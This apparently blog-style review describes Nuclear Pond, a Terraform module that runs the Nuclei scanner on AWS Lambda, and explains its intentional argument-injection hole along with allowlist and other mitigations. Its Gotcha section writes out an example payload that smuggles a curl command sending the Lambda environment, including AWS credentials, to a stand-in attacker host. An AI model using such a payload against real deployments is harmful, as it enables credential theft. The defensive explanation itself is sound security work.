Building a Serverless Nuclei Scanner with Terraform: Nuclear Pond's Lambda-Powered Security Architecture
Hook
Nuclear Pond deliberately ships with a Remote Code Execution vulnerability that lets attackers run arbitrary commands in your AWS Lambda functions. The maintainers know, and they're not fixing it.
Context
Security scanning traditionally requires persistent infrastructure: servers running 24/7, consuming resources even when idle, and requiring maintenance updates. Nuclei, ProjectDiscovery's popular vulnerability scanner with over 5,000 community templates, is incredibly powerful but needs somewhere to run. For teams practicing continuous security scanning—validating infrastructure after every deployment, checking endpoints hourly, or running compliance audits on schedules—paying for always-on EC2 instances feels wasteful.
Nuclear Pond solves this by transforming Nuclei into a serverless function. You get Nuclei's extensive template library for detecting misconfigurations, CVEs, and security issues, but packaged as AWS Lambda infrastructure that only costs money during actual scans. The Terraform module handles the complexity of bundling a Go binary scanner, its template library, and configuration files into Lambda's constrained execution environment. It's infrastructure-as-code for security-as-code, designed for DevSecOps teams who want automated vulnerability scanning without managing servers.
Technical Insight
Nuclear Pond's architecture elegantly solves Lambda's biggest packaging challenges through layer separation. The module creates three distinct Lambda layers: one for the Nuclei binary (a static Go executable), one for Nuclei's vulnerability templates downloaded from GitHub releases, and one for configuration files. This separation is brilliant—you can update templates independently without redeploying the entire function, crucial since ProjectDiscovery releases new vulnerability signatures constantly.
The build process uses Terraform's null_resource provisioner with local-exec to orchestrate compilation:
resource "null_resource" "build_lambda" {
  provisioner "local-exec" {
    command = <<-EOT
      cd ${path.module}/lambda
      curl -L https://github.com/projectdiscovery/nuclei/releases/download/v2.9.4/nuclei_2.9.4_linux_amd64.zip -o nuclei.zip
      unzip -o nuclei.zip
      GOOS=linux GOARCH=amd64 go build -o bootstrap handler.go
    EOT
  }

  triggers = {
    always_run = timestamp()
  }
}
This downloads Nuclei from GitHub, extracts the binary, and compiles the Go handler that wraps Nuclei invocations. The timestamp() trigger forces rebuilding on every apply—a development convenience that becomes a production headache.
The Lambda handler itself is where things get interesting and dangerous. Users invoke the function with JSON payloads like {"target": "https://example.com", "args": "-severity critical"}. The handler passes these arguments directly to Nuclei using Go's exec.Command:
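// Split the caller-supplied string on single spaces; nothing is validated.
args := strings.Split(event.Args, " ")
// Run the Nuclei binary from the layer with exactly those arguments.
cmd := exec.Command("/opt/nuclei", args...)
// Point HOME at /tmp, the only writable path in Lambda.
cmd.Env = append(os.Environ(), "HOME=/tmp")
output, err := cmd.CombinedOutput()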
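Notice anything missing? No input sanitization. No argument validation. No allowlist of permitted flags. One nuance matters here: exec.Command starts the binary directly rather than through a shell, so shell metacharacters in args reach Nuclei as literal text. The exposure is argument injection. Whoever controls the args field can pass any flag Nuclei accepts, for example -t to load templates they supply or -o to choose where output is written, which can be enough to run attacker-chosen logic inside the function. This is the intentional RCE vulnerability, with flexibility prioritized over security. The maintainers assume you'll only accept input from trusted sources: your own CI/CD pipeline, scheduled CloudWatch Events, or authenticated internal APIs.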
The /tmp HOME directory workaround addresses Nuclei's hardcoded expectation that configuration lives in $HOME/.config. Lambda's filesystem is read-only except for /tmp, so Nuclear Pond tricks Nuclei by changing HOME. But /tmp persists across warm Lambda invocations, meaning configuration state from one scan might pollute the next. If a malicious scan writes to /tmp/.config/nuclei, subsequent invocations in the same Lambda container inherit that configuration.
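One way to limit that carry-over, sketched here as an assumption rather than something the module does, is to give each invocation its own HOME directory and delete it afterwards. The helper names withScratchHome and pathExists are hypothetical, and the -version flag is only a harmless demo argument.

```go
package main

import (
	"fmt"
	"os"
	"os/exec"
)

// withScratchHome creates a fresh directory under base, passes it to fn,
// and removes it when fn returns, so nothing written there survives into
// the next warm invocation. An empty base means the default temp directory.
func withScratchHome(base string, fn func(home string) error) error {
	home, err := os.MkdirTemp(base, "nuclei-home-")
	if err != nil {
		return fmt.Errorf("create scratch HOME: %w", err)
	}
	defer os.RemoveAll(home)
	return fn(home)
}

// pathExists reports whether path is still present on disk.
func pathExists(path string) bool {
	_, err := os.Stat(path)
	return err == nil
}

func main() {
	var used string
	err := withScratchHome(os.TempDir(), func(home string) error {
		used = home
		// Binary path as in the handler excerpt; it will simply fail to
		// start on machines where /opt/nuclei does not exist.
		cmd := exec.Command("/opt/nuclei", "-version")
		cmd.Env = append(os.Environ(), "HOME="+home)
		out, runErr := cmd.CombinedOutput()
		fmt.Printf("%s", out)
		return runErr
	})
	fmt.Printf("err=%v, scratch HOME still present: %v\n", err, pathExists(used))
}
```

The trade-off is that Nuclei can no longer reuse anything it cached under HOME between warm invocations, so each scan starts cold.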
Results flow to S3 buckets created by the module, organized by scan timestamp. The integration with AWS Glue Data Catalog is forward-thinking—it automatically creates table schemas for scan results, enabling SQL queries via Athena. You can run analytics like "show me all critical vulnerabilities discovered in the last 30 days" without custom parsing scripts:
SELECT info.name, info.severity, matched_at
FROM nuclei_scans
WHERE info.severity = 'critical'
  AND scan_date > current_date - interval '30' day;
The DynamoDB integration provides state management for tracking scan history and preventing duplicate scans of the same targets. Each scan writes metadata to DynamoDB with TTL expiration, creating a time-windowed deduplication mechanism. This prevents wasting Lambda invocations rescanning targets that were checked five minutes ago.
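The time-windowed check can be modeled in a few lines of Go. This sketch replaces DynamoDB with an in-memory map so it runs anywhere; Deduper, NewDeduper, and ShouldScan are hypothetical names, and the real table layout may differ. Expiry is kept in Unix epoch seconds, the format DynamoDB expects for a TTL attribute.

```go
package main

import "fmt"

// Deduper is an in-memory stand-in for the DynamoDB table. It stores, per
// target, the Unix time (in seconds) at which the last scan record expires.
type Deduper struct {
	windowSecs int64
	expiresAt  map[string]int64
}

// NewDeduper returns a Deduper that suppresses repeat scans of a target
// for windowSecs seconds after each accepted scan.
func NewDeduper(windowSecs int64) *Deduper {
	return &Deduper{windowSecs: windowSecs, expiresAt: make(map[string]int64)}
}

// ShouldScan reports whether target is due for a scan at nowUnix. When it
// is, a new expiry is recorded so later requests inside the window are skipped.
func (d *Deduper) ShouldScan(target string, nowUnix int64) bool {
	if exp, ok := d.expiresAt[target]; ok && nowUnix < exp {
		return false // an unexpired record exists: skip the rescan
	}
	d.expiresAt[target] = nowUnix + d.windowSecs
	return true
}

func main() {
	d := NewDeduper(30 * 60) // 30-minute window, chosen only for the demo
	start := int64(1_700_000_000)
	fmt.Println(d.ShouldScan("https://example.com", start))       // first request
	fmt.Println(d.ShouldScan("https://example.com", start+5*60))  // inside the window
	fmt.Println(d.ShouldScan("https://example.com", start+31*60)) // window elapsed
}
```

Against a real table the explicit expiry comparison still matters, because DynamoDB removes expired items in the background rather than at the exact TTL timestamp.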
Lambda's 15-minute maximum execution time and configurable memory (128MB to 10GB) create hard boundaries. Nuclear Pond defaults to 512MB memory and accepts the 15-minute wall. For scanning single endpoints or small target lists, this works fine. For scanning entire CIDR ranges or running comprehensive template sets against hundreds of targets, you'll hit timeouts. The module doesn't implement pagination or result streaming—scans either complete or fail.
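When a target list is too large for one invocation, the caller can split it before invoking the function. The sketch below assumes the batching happens outside the module, for example in a CI job; chunkTargets is a hypothetical helper, and the right batch size depends on your templates and targets.

```go
package main

import "fmt"

// chunkTargets splits targets into batches of at most size entries so that
// each batch can be handed to its own Lambda invocation.
// A non-positive size yields no batches.
func chunkTargets(targets []string, size int) [][]string {
	if size <= 0 {
		return nil
	}
	var batches [][]string
	for start := 0; start < len(targets); start += size {
		end := start + size
		if end > len(targets) {
			end = len(targets)
		}
		batches = append(batches, targets[start:end])
	}
	return batches
}

func main() {
	targets := []string{
		"https://a.example", "https://b.example", "https://c.example",
		"https://d.example", "https://e.example",
	}
	for i, batch := range chunkTargets(targets, 2) {
		fmt.Printf("invocation %d: %v\n", i+1, batch)
	}
}
```

Each batch still has to finish inside the timeout on its own, so this moves the limit rather than removing it.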
Gotcha
The RCE vulnerability isn't theoretical. It's exploitable in any deployment where untrusted users can submit scan requests. If you expose Nuclear Pond through an API Gateway or web interface without rigorous input validation, attackers control every flag Nuclei receives. A shell-style payload such as {"args": "--version; curl attacker.com/exfiltrate?data=$(cat /proc/self/environ)"} works only if the arguments pass through a shell (for example via sh -c); with a direct exec.Command call like the one shown earlier, the same goal is pursued through argument injection instead. Either way the prize is the Lambda environment, which holds the execution role's temporary AWS credentials alongside any secrets set as environment variables. The Lambda execution role necessarily has S3 write permissions and DynamoDB access, providing lateral movement opportunities. Mitigation requires implementing a strict allowlist of Nuclei arguments in your handler code or ensuring the Lambda is only invocable by trusted AWS principals.
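The allowlist mitigation can be sketched in Go. This is a minimal illustration, not Nuclear Pond's handler: the validateArgs function, the allowedFlags table, and the decision to permit only -severity and -tags are all assumptions made for the example.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// allowedFlags is a hypothetical allowlist: each permitted Nuclei flag maps
// to the pattern its value must match. Adjust it to the scans you really run.
var allowedFlags = map[string]*regexp.Regexp{
	"-severity": regexp.MustCompile(`^(info|low|medium|high|critical)(,(info|low|medium|high|critical))*$`),
	"-tags":     regexp.MustCompile(`^[a-z0-9_-]+(,[a-z0-9_-]+)*$`),
}

var errRejected = errors.New("argument rejected by allowlist")

// validateArgs splits the raw args string and accepts only "flag value"
// pairs listed in allowedFlags. Anything else fails the whole request.
func validateArgs(raw string) ([]string, error) {
	fields := strings.Fields(raw) // tolerates repeated spaces
	if len(fields)%2 != 0 {
		return nil, fmt.Errorf("%w: expected flag/value pairs", errRejected)
	}
	for i := 0; i < len(fields); i += 2 {
		flag, value := fields[i], fields[i+1]
		pattern, ok := allowedFlags[flag]
		if !ok {
			return nil, fmt.Errorf("%w: flag %q", errRejected, flag)
		}
		if !pattern.MatchString(value) {
			return nil, fmt.Errorf("%w: value %q for %s", errRejected, value, flag)
		}
	}
	return fields, nil
}

func main() {
	for _, raw := range []string{
		"-severity critical",
		"-severity critical,high -tags cve",
		"-t http://attacker.example/evil.yaml",
		"-severity critical; id",
	} {
		args, err := validateArgs(raw)
		fmt.Printf("%q -> %v, err=%v\n", raw, args, err)
	}
}
```

Rejecting the whole request on the first unknown flag keeps the policy easy to audit. The validated slice can then be passed to exec.Command in place of the raw split.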
The always_run = timestamp() trigger means Terraform rebuilds Lambda packages on every apply, even when source code hasn't changed. This slows deployments and creates unnecessary S3 storage consumption from versioned Lambda packages. During iterative development, you'll wait through recompilation and repackaging cycles that could be avoided with content-based hashing (like using filemd5() of source files).
Lambda also limits total deployment package size to 250MB uncompressed, and Nuclei's template library alone approaches 100MB. Adding custom templates or additional scanning tools risks hitting this ceiling. The workaround involves pruning templates or splitting functionality across multiple Lambda functions, fragmenting your infrastructure.
Verdict
Use if: You're a security team with full control over scan inputs, need scheduled vulnerability scanning of your own infrastructure integrated with AWS-native analytics, and want to avoid managing persistent scanning infrastructure. Nuclear Pond excels for internal DevSecOps pipelines where CloudWatch Events trigger hourly scans of your staging environments, results feed into Athena dashboards, and you trust all code paths leading to Lambda invocations. It's perfect for compliance automation where scan parameters are hardcoded in Terraform, not user-provided.
Skip if: You're building a multi-tenant scanning service, need to accept scan requests from untrusted users, require scanning beyond Lambda's 15-minute execution limit, or want production-ready security without architectural overhaul for input validation. The intentional RCE vulnerability and Lambda constraints make this a specialized tool for trusted environments, not a general-purpose security platform. For anything user-facing or requiring hardened security, self-hosted Nuclei on ECS with proper input sanitization is the safer choice despite the infrastructure overhead.